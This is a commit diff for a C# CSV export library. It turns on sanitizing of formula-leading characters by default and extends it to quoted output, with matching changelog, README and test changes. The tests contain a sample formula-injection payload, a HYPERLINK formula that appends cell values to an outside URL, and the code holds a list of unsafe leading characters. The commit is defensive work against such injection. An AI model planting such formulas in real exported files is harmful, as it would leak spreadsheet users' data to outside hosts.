Sanitize strings even when escape characters are used, and bump major… (#33)

* Sanitize strings even when escape characters are used, and bump major version

- The default for _sanitizeStrings has been changed from false to True
- Strings are now sanitized even when _includeEscapeCharacters is set to True

* Set SanitizeStrings back to false for tests

* Add links to CHANGELOG

Co-authored-by: Steven Birks <steven.birks@enable.com>

Author: StevenBirks

CHANGELOG.md

@@ -5,6 +5,19 @@ This project adheres to [Semantic Versioning](http://semver.org/).
 
 ## [Unreleased][unreleased]
 
+## [6.0.0] - 2021-12-13
+
+### Added
+
+- Update _sanitizeStrings default to `true`.
+- Sanitize strings will now also take effect when escape characters are used.
+
+## [5.0.0] - 2021-11-23
+
+### Added
+
+- Add the option to trim column headers when reading from the input text, and make it the default.
+
 ## [4.2.1] - 2020-11-17
 
 ### Added
@@ -140,6 +153,8 @@ This project adheres to [Semantic Versioning](http://semver.org/).
 - Initial public release.
 
 [unreleased]: https://github.com/EnableSoftware/DelimitedDataParser/compare/v4.2.0...HEAD
+[6.0.0]: https://github.com/EnableSoftware/DelimitedDataParser/compare/v5.0.0...v6.0.0
+[5.0.0]: https://github.com/EnableSoftware/DelimitedDataParser/compare/v4.2.1...v5.0.0
 [4.2.1]: https://github.com/EnableSoftware/DelimitedDataParser/compare/v4.2.0...v4.2.1
 [4.2.0]: https://github.com/EnableSoftware/DelimitedDataParser/compare/v4.1.0...v4.2.0
 [4.1.0]: https://github.com/EnableSoftware/DelimitedDataParser/compare/v4.0.3...v4.1.0

README.md

@@ -65,7 +65,7 @@ using (var fileWriter = File.CreateText("my.csv"))
 ### Configuration properties
 
 * `FieldSeparator` - the character used as field delimiter in the text file. Default: `,` (i.e., CSV).
-* `SanitizeStrings` - specifies whether strings should be sanitized, prepending blacklisted characters at the start of the string with a single quote `'`. The default value is `false`.
+* `SanitizeStrings` - specifies whether strings should be sanitized, prepending blacklisted characters at the start of the string with a single quote `'`. Default: `true`.
 * `IncludeEscapeCharacters` - specifies whether each value should be escaped by wrapping in quotation marks. Default: `true`.
 * `OutputColumnHeaders` - specifies whether an initial row containing column names should be written to the output. Default: `true`.
 * `UseExtendedPropertyForColumnName(string key)` - specifies a key that is used to search on the ExtendedProperties of a DataColumn. If it finds a value this will be used as the column header, if no match is found it will default to the column's ColumnName. This should be used if you are required to output a different column header to what is stored on the column's ColumnName.

src/DelimitedDataParser/DelimitedDataParser.csproj

@@ -6,7 +6,7 @@
         <CodeAnalysisRuleSet>..\..\CustomExtendedCorrectnessRules.ruleset</CodeAnalysisRuleSet>
         <Authors>Enable · enable.com</Authors>
         <Company>Enable</Company>
-        <Version>5.0.0</Version>
+        <Version>6.0.0</Version>
         <Description>C# library for parsing and exporting tabular data in delimited format (e.g. CSV).</Description>
         <Copyright>Copyright © 2018</Copyright>
         <PackageIconUrl>https://github.com/EnableSoftware.png</PackageIconUrl>

src/DelimitedDataParser/Exporter.cs

@@ -19,15 +19,15 @@ public class Exporter
         public static readonly char TabSeparator = '\t';
 
         private static readonly string[] UnsafeLeadingCharacters = { "=", "+", "-", "@" };
-        
+
         private readonly IProgress<int> _progress;
 
         private ISet<string> _columnNamesAsText;
         private IDictionary<string, string> _extendedPropertyValueLookup;
 
         private char _fieldSeparator = ',';
         private bool _includeEscapeCharacters = true;
-        private bool _sanitizeStrings;
+        private bool _sanitizeStrings = true;
         private bool _outputColumnHeaders = true;
         private bool _useExtendedPropertyForColumnName;
         private string _extendedPropertyKey;
@@ -307,6 +307,11 @@ private static string Sanitize(string value)
         /// <returns>The escaped string</returns>
         private string CsvEscape(string value, bool valueAsText)
         {
+            if (_sanitizeStrings)
+            {
+                value = Sanitize(value);
+            }
+
             if (_includeEscapeCharacters)
             {
                 value = value.Replace(@"""", @"""""");
@@ -321,11 +326,6 @@ private string CsvEscape(string value, bool valueAsText)
                 }
             }
 
-            if (_sanitizeStrings)
-            {
-                value = Sanitize(value);
-            }
-
             return value;
         }
 

test/DelimitedDataParser.Test/ExporterTest.Reader.cs

@@ -608,6 +608,7 @@ public void ExportReader_Supports_Large_Dataset()
                     stringReader = null;
 
                     var sut = new Exporter();
+                    sut.SanitizeStrings = false;
 
                     stopwatch = Stopwatch.StartNew();
                     output = sut.ExportToString(dataReader);

test/DelimitedDataParser.Test/ExporterTest.cs

@@ -424,6 +424,7 @@ public void Supports_Huge_Table()
             }
 
             var exporter = new Exporter();
+            exporter.SanitizeStrings = false;
 
             var stopwatch = System.Diagnostics.Stopwatch.StartNew();
 
@@ -580,7 +581,7 @@ public void Exports_Unquoted_Data()
         [InlineData("-", "'-")]
         [InlineData("@", "'@")]
         [InlineData(@"=HYPERLINK(""http://example.com?leak=""&A1&A2, ""Click here"")", @"'=HYPERLINK(""http://example.com?leak=""&A1&A2, ""Click here"")")]
-        public void Sanitizer_Escapes_Blacklisted_Characters(string inputString, string expectedOutput)
+        public void Sanitizer_Escapes_Blacklisted_Characters_WithoutEscapeCharacters(string inputString, string expectedOutput)
         {
             var input = CreateDataTable();
             AddColumn(input, "One");
@@ -602,6 +603,34 @@ public void Sanitizer_Escapes_Blacklisted_Characters(string inputString, string
                 output);
         }
 
+        [Theory]
+        [InlineData("=", @"""'=""")]
+        [InlineData("+", @"""'+""")]
+        [InlineData("-", @"""'-""")]
+        [InlineData("@", @"""'@""")]
+        [InlineData(@"=HYPERLINK(""http://example.com?leak=""&A1&A2, ""Click here"")", @"""'=HYPERLINK(""""http://example.com?leak=""""&A1&A2, """"Click here"""")""")]
+        public void Sanitizer_Escapes_Blacklisted_Characters_WithEscapeCharacters(string inputString, string expectedOutput)
+        {
+            var input = CreateDataTable();
+            AddColumn(input, "One");
+            AddColumn(input, "Two");
+
+            AddRow(input, inputString, inputString);
+
+            var exporter = new Exporter
+            {
+                IncludeEscapeCharacters = true,
+                SanitizeStrings = true
+            };
+
+            var output = exporter.ExportToString(input);
+
+            Assert.Equal(
+                @"""One"",""Two""" + Environment.NewLine
+                + string.Concat(expectedOutput + ",", expectedOutput),
+                output);
+        }
+
         [Theory]
         [InlineData("abcdef")]
         [InlineData("abc + def - ghi @ jkl")]